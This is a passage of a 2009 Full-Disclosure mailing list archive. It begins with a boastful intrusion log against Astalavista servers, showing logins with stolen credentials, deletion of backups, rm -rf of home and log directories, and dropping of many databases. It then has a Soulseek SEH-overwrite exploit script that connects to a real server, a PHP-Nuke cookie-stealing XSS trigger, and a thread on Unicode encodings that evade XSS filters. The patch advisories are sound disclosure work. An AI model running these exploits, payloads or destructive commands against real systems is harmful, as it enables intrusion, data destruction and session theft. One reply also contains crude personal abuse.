http://www.yellostrom.de/ | +------------------+------------------------------------------------ ---------------------------------------------+ 1 row in set (0.00 sec) // ha ha. mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7; +--------------------------+---------------------------------------- -------------------------------------------------------------------+ | iss_summary | iss_description | +--------------------------+---------------------------------------- -------------------------------------------------------------------+ | Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. | +--------------------------+---------------------------------------- -------------------------------------------------------------------+ 1 row in set (0.00 sec) // LOL. mysql> exit Bye sh-3.2# ftp 212.254.194.163 Connected to 212.254.194.163. 220 BackupCOM_VW FTP server ready. 504 AUTH: security mechanism 'GSSAPI' not supported. 504 AUTH: security mechanism 'KERBEROS_V4' not supported. KERBEROS_V4 rejected as an authentication type Name (212.254.194.163:root): astalavista.com 331 Password required for astalavista.com. Password: 230 User astalavista.com logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 227 Entering Passive Mode (212,254,194,163,2,188) 150 Opening BINARY mode data connection for 'file list'. dr-x------ 1 root users 4096 Jun 4 06:13 astalavista.com 226 Transfer complete. ftp> cd astalavista.com 250 CWD command successful. ftp> ls -la 227 Entering Passive Mode (212,254,194,163,2,189) 150 Opening BINARY mode data connection for 'file list'. -rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar -rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2 -rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2 -rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar -rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar [snip] 226 Transfer complete. ftp> mdelete * ftp> ls -la 227 Entering Passive Mode (212,254,194,163,2,193) 150 Opening BINARY mode data connection for 'file list'. 226 Transfer complete. ftp> sh-3.2# cd /home sh-3.2# ls -la total 120 drwxr-xr-x 14 root root 4096 Mar 11 17:56 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. drwx--x--x 9 admin admin 4096 Nov 28 2007 admin -rw------- 1 root root 8192 Jun 4 03:03 aquota.group -rw------- 1 root root 8192 Jun 3 02:45 aquota.user drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet drwxr-xr-x 2 root root 4096 Jul 29 2008 backup drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 drwx--x--x 10 com com 4096 Apr 28 12:40 com drwxr-xr-x 2 root root 4096 May 17 2007 ftp drwx------ 3 jon jon 4096 Sep 21 2007 jon drwx------ 2 root root 16384 Sep 11 2007 lost+found drwxr-xr-x 2 root root 4096 Sep 14 2007 my drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata drwx------ 2 jon jon 4096 Sep 15 2007 test drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp sh-3.2# rm -rf backup/ sh-3.2# rm -rf backup.14161/ sh-3.2# rm -rf ftp/ sh-3.2# rm -rf jon/ sh-3.2# rm -rf my/ sh-3.2# rm -rf mysqldata/ sh-3.2# rm -rf test/ sh-3.2# rm -rf tmp/ sh-3.2# cd ~ sh-3.2# rm -rf * sh-3.2# rm -rf /var/log/ rm: cannot remove directory `/var/log//proftpd': Directory not empty sh-3.2# rm -rf /home/* sh-3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 407156 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +-----------------------+ | Database | +-----------------------+ | information_schema | | astanet_ads | | astanet_mailing_lists | | astanet_mediawiki | | astanet_membersystem | | com_contrexx | | com_contrexx2 | | com_contrexx2_live | | da_roundcube | | dolphin | | ideapool | | mysql | | test | | yourmaster | +-----------------------+ 14 rows in set (0.03 sec) mysql> drop database astanet_membersystem; droQuery OK, 46 rows affected (0.81 sec) mysql> drop database com_contrexx; Query OK, 211 rows affected (2.72 sec) mysql> drop database com_contrexx2; Query OK, 237 rows affected (2.23 sec) mysql> drop database com_contrexx2_live; Query OK, 227 rows affected (7.63 sec) mysql> drop database ideapool; Query OK, 69 rows affected (0.19 sec) mysql> drop database yourmaster; Query OK, 158 rows affected (0.55 sec) mysql> drop database astanet_ads; Query OK, 9 rows affected (0.11 sec) mysql> drop database astanet_mailing_lists; Query OK, 24 rows affected (1.47 sec) mysql> drop database astanet_mediawiki; Query OK, 31 rows affected (0.51 sec) mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | da_roundcube | | dolphin | | mysql | | test | +--------------------+ 5 rows in set (0.00 sec) What a journey! We're not sure exactly why the "Terminator" had any influence on their naming (conventions) but we're sure Arnold himself wouldn't be in the wrong to say this pack of morons *wont be back*. -- Explore Africa with a luxurious safari vacation. Click now! http://tagline.hushmail.com/fc/BLSrjkqibJ4YFlT0yWUQGlcnCi5pjZKvouw2zmCrKTyocKlZVTVGpO7c11G/ From pete.licoln at gmail.com Fri Jun 5 07:01:55 2009 From: pete.licoln at gmail.com (Pete Licoln) Date: Fri, 5 Jun 2009 02:01:55 -0400 Subject: [Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution In-Reply-To: References: <4b13609c0905251454v10322da7v1727e8ac5402899c@mail.gmail.com> Message-ID: Seems like you have a problem with responsible disclosure Kid ; Do you have any familly relationship with jeremy Brown ? ;P http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments 2009/5/25 Pete Licoln > Oh so you have a blog ... > http://g-laurent.blogspot.com/ > > 2009/5/25 laurent gaffie > >> ============================================= >> - Release date: May 24th, 2009 >> - Discovered by: Laurent Gaffi? >> - Severity: critical >> ============================================= >> >> I. VULNERABILITY >> ------------------------- >> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution >> >> II. BACKGROUND >> ------------------------- >> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file >> sharing application. >> One of the things that makes Soulseek(tm) unique is our community and >> community-related features. >> Based on peer-to-peer technology, virtual rooms allow you to meet people >> with >> the same interests, share information, and chat freely using real-time >> messages >> in public or private. >> Soulseek(tm), with its built-in people matching system, is a great way to >> make >> new friends and expand your mind!" >> >> III. DESCRIPTION >> ------------------------- >> Soulseek client allows distributed file search to one person, everyone, or >> in a >> specific Soulseek IRC channel, allowing a user to find the files he wants, >> in >> a dedicated channel, or with his contacts, or on the whole network. >> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a >> specific >> user, or even to a whole Soulseek IRC channel. >> >> IV. PROOF OF CONCEPT >> ------------------------- >> This proof of concept is made to prevent a S-K party, it is only build to >> target the user "testt4321". >> >> To try this proof of concept, you would have to open a soulseek client and >> use >> the username: >> "testt4321" >> with the password: >> "12345678" >> And launch this code. >> If you want to change the username or target a whole channel, you would >> have >> to reverse the binary protocol >> >> >> >> #!/usr/bin/python >> import struct >> import sys, socket >> from time import * >> >> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) >> s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch >> >> buffer = >> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74" >> buffer+= >> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38" >> buffer+= >> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30" >> buffer+= >> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35" >> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00" >> >> s.send(buffer) >> sleep(1) >> >> junk = "\x41" * 3084 >> next_seh = struct.pack('> seh = struct.pack('> other_junk = "\x61" * 1423 >> >> buffer2 = >> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74" >> buffer2+= >> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk >> s.send(buffer2) >> sleep(1) >> s.recv(1024) >> >> >> >> After the query is send, the memory will look like this >> 0012FBE4 41414141 >> 0012FBE8 42424242 Pointer to next SEH record >> 0012FBEC 43434343 SE handler >> 0012FBF0 61616161 >> >> And the program will terminate with this structure: >> EAX 00000000 >> ECX 43434343 >> EDX 7C9132BC ntdll.7C9132BC >> EBX 00000000 >> ESP 0012EA78 >> EBP 0012EA98 >> ESI 00000000 >> EDI 00000000 >> EIP 43434343 >> >> >> V. BUSINESS IMPACT >> ------------------------- >> An attacker could exploit this vulnerability to compromise any Soulseek >> client connected to >> the Soulseek network. >> >> VI. SYSTEMS AFFECTED >> ------------------------- >> Windows all versions running Soulseek * >> >> VII. SOLUTION >> ------------------------- >> A fast solution would be to use Nicotine-Plus ( >> http://nicotine-plus.sourceforge.net/) >> a Python Soulseek client. >> Another quick workaround (at server level) would be to limit the search >> query lenght. >> >> VIII. REFERENCES >> ------------------------- >> http://www.slsknet.org >> >> IX. CREDITS >> ------------------------- >> This vulnerability has been discovered by Laurent Gaffi? >> Laurent.gaffie{remove-this}(at)gmail.com >> >> >> X. REVISION HISTORY >> ------------------------- >> May 24, 2009: Initial release >> >> >> XI. DISCLOSURE TIMELINE >> ------------------------- >> july 29, 2008: Bug discovered >> September 03, 2008: Vendor contacted; no response. >> October 14, 2008: Vendor contacted; still no response. >> April 12, 2009: Idefense contacted. >> April 13, 2009: Idefense answered. >> April 23, 2009: Advisory send to idefense contributor program. >> May 13, 2009: Idefense contacted, bug rejected (no reason given) >> May 15, 2009: Idefense recontacted; no answer. >> May 16, 2009: Last try to contact Soulseek maintainers >> May 24, 2009: Advisory published. >> >> XII. LEGAL NOTICES >> ------------------------- >> The information contained within this advisory is supplied "as-is" >> with no warranties or guarantees of fitness of use or otherwise. >> I accept no responsibility for any damage caused by the use or >> misuse of this information. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090605/abe3cd02/attachment.html From laurent.gaffie at gmail.com Fri Jun 5 07:15:52 2009 From: laurent.gaffie at gmail.com (laurent gaffie) Date: Fri, 5 Jun 2009 02:15:52 -0400 Subject: [Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution In-Reply-To: References: <4b13609c0905251454v10322da7v1727e8ac5402899c@mail.gmail.com> Message-ID: <4b13609c0906042315s3b102cd9ndd476edfab4b5a7f@mail.gmail.com> It seem like you're an asshole, and also it seems you have some undisclosed brain-prick activity, which mean that i should foward all the spams i get to you , including "*Ritalin solution"*, get valium, and clearly: enlarge your penis ( as your girlfriend asked me to do that call for you ) Now if you please, get the fuck out of this mailing list, and get a life kid. 009/6/5 Pete Licoln > Seems like you have a problem with responsible disclosure Kid ; > Do you have any familly relationship with jeremy Brown ? ;P > > > http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments > > 2009/5/25 Pete Licoln > > Oh so you have a blog ... >> http://g-laurent.blogspot.com/ >> >> 2009/5/25 laurent gaffie >> >>> ============================================= >>> - Release date: May 24th, 2009 >>> - Discovered by: Laurent Gaffi? >>> - Severity: critical >>> ============================================= >>> >>> I. VULNERABILITY >>> ------------------------- >>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution >>> >>> II. BACKGROUND >>> ------------------------- >>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file >>> >>> sharing application. >>> One of the things that makes Soulseek(tm) unique is our community and >>> community-related features. >>> Based on peer-to-peer technology, virtual rooms allow you to meet people >>> with >>> the same interests, share information, and chat freely using real-time >>> messages >>> in public or private. >>> Soulseek(tm), with its built-in people matching system, is a great way to >>> make >>> new friends and expand your mind!" >>> >>> III. DESCRIPTION >>> ------------------------- >>> Soulseek client allows distributed file search to one person, everyone, >>> or in a >>> specific Soulseek IRC channel, allowing a user to find the files he >>> wants, in >>> a dedicated channel, or with his contacts, or on the whole network. >>> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a >>> specific >>> user, or even to a whole Soulseek IRC channel. >>> >>> IV. PROOF OF CONCEPT >>> ------------------------- >>> This proof of concept is made to prevent a S-K party, it is only build to >>> >>> target the user "testt4321". >>> >>> To try this proof of concept, you would have to open a soulseek client >>> and use >>> the username: >>> "testt4321" >>> with the password: >>> "12345678" >>> And launch this code. >>> If you want to change the username or target a whole channel, you would >>> have >>> to reverse the binary protocol >>> >>> >>> >>> #!/usr/bin/python >>> import struct >>> import sys, socket >>> from time import * >>> >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) >>> s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch >>> >>> buffer = >>> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74" >>> buffer+= >>> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38" >>> buffer+= >>> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30" >>> buffer+= >>> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35" >>> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00" >>> >>> s.send(buffer) >>> sleep(1) >>> >>> junk = "\x41" * 3084 >>> next_seh = struct.pack('>> seh = struct.pack('>> other_junk = "\x61" * 1423 >>> >>> buffer2 = >>> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74" >>> buffer2+= >>> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk >>> s.send(buffer2) >>> sleep(1) >>> s.recv(1024) >>> >>> >>> >>> After the query is send, the memory will look like this >>> 0012FBE4 41414141 >>> 0012FBE8 42424242 Pointer to next SEH record >>> 0012FBEC 43434343 SE handler >>> 0012FBF0 61616161 >>> >>> And the program will terminate with this structure: >>> EAX 00000000 >>> ECX 43434343 >>> EDX 7C9132BC ntdll.7C9132BC >>> EBX 00000000 >>> ESP 0012EA78 >>> EBP 0012EA98 >>> ESI 00000000 >>> EDI 00000000 >>> EIP 43434343 >>> >>> >>> V. BUSINESS IMPACT >>> ------------------------- >>> An attacker could exploit this vulnerability to compromise any Soulseek >>> client connected to >>> the Soulseek network. >>> >>> VI. SYSTEMS AFFECTED >>> ------------------------- >>> Windows all versions running Soulseek * >>> >>> VII. SOLUTION >>> ------------------------- >>> A fast solution would be to use Nicotine-Plus ( >>> http://nicotine-plus.sourceforge.net/) >>> a Python Soulseek client. >>> Another quick workaround (at server level) would be to limit the search >>> query lenght. >>> >>> VIII. REFERENCES >>> ------------------------- >>> http://www.slsknet.org >>> >>> IX. CREDITS >>> ------------------------- >>> This vulnerability has been discovered by Laurent Gaffi? >>> Laurent.gaffie{remove-this}(at)gmail.com >>> >>> >>> X. REVISION HISTORY >>> ------------------------- >>> May 24, 2009: Initial release >>> >>> >>> XI. DISCLOSURE TIMELINE >>> ------------------------- >>> july 29, 2008: Bug discovered >>> September 03, 2008: Vendor contacted; no response. >>> October 14, 2008: Vendor contacted; still no response. >>> April 12, 2009: Idefense contacted. >>> April 13, 2009: Idefense answered. >>> April 23, 2009: Advisory send to idefense contributor program. >>> May 13, 2009: Idefense contacted, bug rejected (no reason given) >>> May 15, 2009: Idefense recontacted; no answer. >>> May 16, 2009: Last try to contact Soulseek maintainers >>> May 24, 2009: Advisory published. >>> >>> XII. LEGAL NOTICES >>> ------------------------- >>> The information contained within this advisory is supplied "as-is" >>> with no warranties or guarantees of fitness of use or otherwise. >>> I accept no responsibility for any damage caused by the use or >>> misuse of this information. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090605/357bf907/attachment.html From lists at nerdbynature.de Fri Jun 5 07:03:43 2009 From: lists at nerdbynature.de (Christian Kujau) Date: Thu, 4 Jun 2009 23:03:43 -0700 (PDT) Subject: [Full-disclosure] Cross Site Scripting in PHP Nuke 8.0 Version In-Reply-To: <922b8380906021337y3e9950b0t569ad8b3bb20b735@mail.gmail.com> References: <922b8380906021337y3e9950b0t569ad8b3bb20b735@mail.gmail.com> Message-ID: On Wed, 3 Jun 2009, Schap Security wrote: > Cross Site Scripting Vulnerability in PHP Nuke 8.0 I think it's dead, Jim: http://phpnuke.org/modules/Release/changelog.txt lists v8.1 as the "current" version...from 08/2007 :-\ > About PHP Nuke:*PHP-Nuke* is a web-based automated news publishing > and content management system based on > PHP and MYSQL. The system is fully controlled using a web-based user > interface > > Affected Version : 8.0 > > Description > PHP Nuke version 8.0 is vulnerable to cross site scripting in query > parameter in modules.php. > > The vulnerability can be triggered as : > > http://www.victime_site.org/modules.php?name=Downloads&d_op=search&query=[XSS] > WHERE [XSS] = '';!--"[script]alert(document.cookie)[/script] > Kind Regards > SCHAP > http://www.schap.org > -- BOFH excuse #298: Not enough interrupts From Thierry at Zoller.lu Fri Jun 5 09:42:35 2009 From: Thierry at Zoller.lu (Thierry Zoller) Date: Fri, 5 Jun 2009 10:42:35 +0200 Subject: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: References: <1010180926.20070522165803@SECURITY.NNOV.RU> <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> Message-ID: <1962868651.20090605104235@Zoller.lu> Hi, AJE> We have seen 44 sites in the last year at WhiteHat Security that were AJE> vulnerable to Fullwidth unicode-encoded attacks. This one tends to be AJE> more ubiquitous than others when you find it. In the applications weak AJE> to this -- we found roughly 200 locations vulnerable to attack in AJE> those 44 applications, and each location would have multiple inputs, AJE> so you are probably talking 1,000+ inputs vulnerable to attack using AJE> this encoding. The discussion of how many inputs are vulnerable is kind of ludicrous isn't it? As it nearly always boils down to the same set of impacts even if you have a trillion of inputs vulnerable, per domain. From security at mandriva.com Fri Jun 5 12:08:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 05 Jun 2009 13:08:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:129 ] file Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:129 http://www.mandriva.com/security/ _______________________________________________________________________ Package : file Date : June 5, 2009 Affected: 2009.1 _______________________________________________________________________ Problem Description: A security vulnerability has been identified and fixed in file: Heap-based buffer overflow in the cdf_read_sat function in src/cdf.c in Christos Zoulas file 5.00 allows user-assisted remote attackers to execute arbitrary code via a crafted compound document file, as demonstrated by a .msi, .doc, or .mpp file. NOTE: some of these details are obtained from third party information (CVE-2009-1515). This update provides file-5.03, which is not vulnerable to this, and other unspecified issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1515 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.1: 714210b7d1f8229a42ad3a74140b56c0 2009.1/i586/file-5.03-2.1mdv2009.1.i586.rpm 22c6a4a5dfd408194d4bc1f675078db1 2009.1/i586/libmagic1-5.03-2.1mdv2009.1.i586.rpm 06514afdf86b584c4ffab7cfe5f27071 2009.1/i586/libmagic-devel-5.03-2.1mdv2009.1.i586.rpm a21c00a45b081ae2f27e6e060df13fa8 2009.1/i586/libmagic-static-devel-5.03-2.1mdv2009.1.i586.rpm 1b433b429b9199afa97f2a5df547815c 2009.1/i586/python-magic-5.03-2.1mdv2009.1.i586.rpm 140b8ffc12d337d70a317a3c1599ab12 2009.1/SRPMS/file-5.03-2.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: dde9982f605e023a9b07dc9933d10a10 2009.1/x86_64/file-5.03-2.1mdv2009.1.x86_64.rpm 004adbba8f58328c07ee3d1c8d2651a0 2009.1/x86_64/lib64magic1-5.03-2.1mdv2009.1.x86_64.rpm a693e89d97dca93c8fba466cab5c9576 2009.1/x86_64/lib64magic-devel-5.03-2.1mdv2009.1.x86_64.rpm 750e3d4d11365b315b3134c07bb432da 2009.1/x86_64/lib64magic-static-devel-5.03-2.1mdv2009.1.x86_64.rpm 77f8329b8a06c038f1c23c837cff756c 2009.1/x86_64/python-magic-5.03-2.1mdv2009.1.x86_64.rpm 140b8ffc12d337d70a317a3c1599ab12 2009.1/SRPMS/file-5.03-2.1mdv2009.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKKNJ1mqjQ0CJFipgRAo5SAJ4msETHMGySvamzGIoP88/iMbncwgCgz7tj 3PXeJkpYjRaYJ8twBeThadc= =gabF -----END PGP SIGNATURE----- From chris at casabasec.com Fri Jun 5 08:00:53 2009 From: chris at casabasec.com (Chris Weber) Date: Fri, 05 Jun 2009 00:00:53 -0700 Subject: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: References: <1010180926.20070522165803@SECURITY.NNOV.RU> <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> Message-ID: <005c01c9e5ab$5e5cd400$1b167c00$@com> Two patterns in Unicode account for these behaviors: 1. Normalization (less of what's happening here) and 2. best-fit mappings (most of what's happening here) The first is a true Unicode standard, the second is a loosely defined set of mappings provided as a convenience to software vendors. In fact, best-fit mappings are mostly a vendor problem, and arguably not Unicode's issue at all. The characters White Hat found in their study are a mix of things. Only two of the characters you listed have Normalization mappings in Unicode, which suggests most weren't normalized by some API in the stack. In fact, you can always count on the full width Latin characters having normalization mappings, because they all do. U+FF1C and U+FF1E ?? normalize to < >, but only using the two 'compatibility' decomposition forms NFKC and NFKD. In any browser, click the following link containing full-width Latin characters, and you'll see they all get transformed to their ASCII equivalents. That's because IDNA calls for Normalization form KC which all browsers implement in URL/IRI handling. It's useful for a quick n dirty Normalization test. http:// ??????.nottrusted.com The other characters you guys found point to some other things too, but not Normalization. U+00AB and U+00BB have no direct mappings suggested for U+003c and U+003E, so this may be a case where the Web-app has implemented its own mapping. Same for U+27E8 and U+27E9. It's sort of uncommon for some developer to go to that extreme, but I've seen it done too. All of the others, like U+3008 to U+2039 have best-fit mappings suggested in the Unicode documentation, located at http://unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WindowsBestFit/bestfit1252 .txt. It's important to realize that those mappings are not a standard, they're provided as a convenience. Chasing these characters down can prove useful - you've found stuff, I've found stuff - but as you're well aware it's more complicated than that. Vendors can implement best-fit mappings however they want. In fact, many of the major frameworks do implement things differently, including ICU, Java, .Net, and some of the native Windows libraries. This happens unbeknownst to many developers as strings get transformed along the stack between API's that use wide chars and others that use native chars. It also happens when: 1. a given character doesn't have a direct mapping 2. when it's been transcoded to a different character set, or 3. just because the API's design chose to behave that way - see http://msdn.microsoft.com/en-us/library/dd374047(VS.85).aspx and http://msdn.microsoft.com/en-us/library/ms404377.aspx. Good finds, fun fun, Chris PS. The upcoming release of our Watcher security testing tool includes detection of character best-fit mappings in Web-apps. -----Original Message----- From: arian.evans at gmail.com [mailto:arian.evans at gmail.com] On Behalf Of Arian J. Evans Sent: Thursday, June 04, 2009 4:42 PM To: Prasad Shenoy Cc: 3APA3A; Full-Disclosure; websecurity at webappsec.org Subject: Re: [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? On Thu, Jun 4, 2009 at 4:22 PM, Prasad Shenoy wrote: > Has %uff1c %uff1e become very common? We have seen 44 sites in the last year at WhiteHat Security that were vulnerable to Fullwidth unicode-encoded attacks. This one tends to be more ubiquitous than others when you find it. In the applications weak to this -- we found roughly 200 locations vulnerable to attack in those 44 applications, and each location would have multiple inputs, so you are probably talking 1,000+ inputs vulnerable to attack using this encoding. > I have found a few places where these > are still exploitable. Sometime in the coming week I will post my > observation from one particular encounter of this vulnerability to get some > responses on what, why and how it is happening. Interesting. I did some research here too, and found a new Unicode standard that I think might be a culprit. I won't be posting any more of the data in this thread. There is simply too much of it Jeremiah will be posting some of it at his blog below, and ultimately there needs to be a good paper on canonicalization. None has yet been written for the web world. The VXer crowd went through this in the 90's with all of their encoding-evasion techniques for viruses, and then K2's Polymorphic Shell Code tool brought similar concepts to payloads delivered across network protocols. Now the same notions of multiple representations and re-assemblies of data, in this case to form exploits, is rearing its head in the webappsec world. Nothing is new under the sun. :) Attackers already use encoding in the wild for SQL injection, and at least one XSS I have seen. Probably 50% of the encoding techniques I know of that can be leveraged to form attacks -- I cannot even find documented. So I know our community has some large knowledge gaps on this subject at the moment and needs more work here. -ae > This email gave a good head start..... > > Cheers, > Prasad Shenoy > > On Thu, Jun 4, 2009 at 6:10 PM, Arian J. Evans > wrote: >> >> Hello 3APA3A -- Remember this thread you started 2 years ago? Long >> Time no discussion on this topic... :) >> >> Turns out you were spot-on. We verified six different variants of >> this. Jeremiah Grossman published details on his blog: >> >> >> http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-point ing.html >> >> It is important to note that when you read the number counts that say: >> >> 11 exploitable XSS in 8 websites: >> %u00ABscript%u00BB >> >> The count of "11" is "11 /path/ locations or forms in a web >> application", not "11 vulnerable inputs". The location might be a .cgi >> or a servlet, with 1 or dozens of inputs in that same location that >> are all "vulnerable" to the same attack technique. >> >> (We call the individual inputs "attack vectors" instead of >> "vulnerabilities" to help people group them and make them more >> actionable. e.g.-people usually don't go fix one input, but instead >> fix the CGI, servlet, form-input/request-handler and all the >> associated inputs at once. So reporting each input individually >> doesn't provide any benefit besides make reports bigger.) >> >> Anyway, there are many more of these kind of >> false-familiar/transliteral transcoding and canonicalization issues. >> >> I will continue to feed anything interesting to Jeremiah and it will >> probably wind up on his blog. >> >> Thanks again for opening my mind up to some new angles for >> filter-evasion tricks! :) >> >> ciao >> >> -- >> Arian Evans >> I invest most of my money in motorcycles, mistresses, and martinis. >> The rest of it I squander. >> >> >> >> >> On Tue, May 22, 2007 at 9:52 AM, Arian J. Evans >> wrote: >> > >> > I'll let you know if this hits. I am running this test currently on >> > about 600 + sites. >> > >> > -ae >> > >> > On 5/22/07, 3APA3A < 3APA3A at security.nnov.ru> wrote: >> >> >> >> Dear full-disclosure at lists.grok.org.uk, >> >> >> >> By the way: I saw Unicode Left Pointing Double Angel Quotation >> >> Mark >> >> (%u00AB) / Unicode Right Pointing Double Angel Quotation Mark >> >> (%u00BB) >> >> are sometimes translated to '<' and '>'. Does somebody >> >> experimented >> >> with >> >> >> >> %u00ABscript%u00BB >> >> >> >> in different environments to bypass filtering in this way? >> >> >> >> -- >> >> http://securityvulns.com/ >> >> /\_/\ >> >> { , . } |\ >> >> +--oQQo->{ ^ }<-----+ \ >> >> | ZARAZA U 3APA3A } You know my name - look up my number (The >> >> Beatles) >> >> +-------------o66o--+ / >> >> |/ >> >> >> ---------------------------------------------------------------------------- >> Join us on IRC: irc.freenode.net #webappsec >> >> Have a question? Search The Web Security Mailing List Archives: >> http://www.webappsec.org/lists/websecurity/archive/ >> >> Subscribe via RSS: >> http://www.webappsec.org/rss/websecurity.rss [RSS Feed] >> >> Join WASC on LinkedIn >> http://www.linkedin.com/e/gis/83336/4B20E4374DBA >> > > > > -- > Thought for the day - > "Emails can hurt feelings. If this one did, please ignore your feelings." > ---------------------------------------------------------------------------- Join us on IRC: irc.freenode.net #webappsec Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/ Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed] Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090605/c657b65b/attachment.html From advisories at isecauditors.com Fri Jun 5 14:14:14 2009 From: advisories at isecauditors.com (ISecAuditors Security Advisories) Date: Fri, 05 Jun 2009 15:14:14 +0200 Subject: [Full-disclosure] [ISecAuditors Security Advisories] Joomla! 1.5.10 JA_Purity Multiple Persistent XSS Message-ID: <4A291A26.7020704@isecauditors.com> ============================================= INTERNET SECURITY AUDITORS ALERT 2009-006 - Original release date: April 5th, 2009 - Last revised: June 5th, 2009 - Discovered by: Juan Galiana Lara - Severity: 6.4/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Joomla! 1.5.10 JA_Purity Multiple Persistent XSS II. BACKGROUND ------------------------- Joomla! is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-use and extensibility, have made Joomla! the most popular Web site software available. Best of all, Joomla! is an open source solution that is freely available to everyone. Joomla! comes with 3 default templates, JA_Purity is one of them. III. DESCRIPTION ------------------------- JA_Purity template is bundled in Joomla! and fails to sanitized user supplied input. An attacker can inject JavaScript or DHTML that will be saved in the cookie making persistent, running in the context of targeted user browser, allowing him to steal cookies. In file 'template/ja_purity/ja_templatetools.php', the getUserSetting() reads $_GET array and makes the data 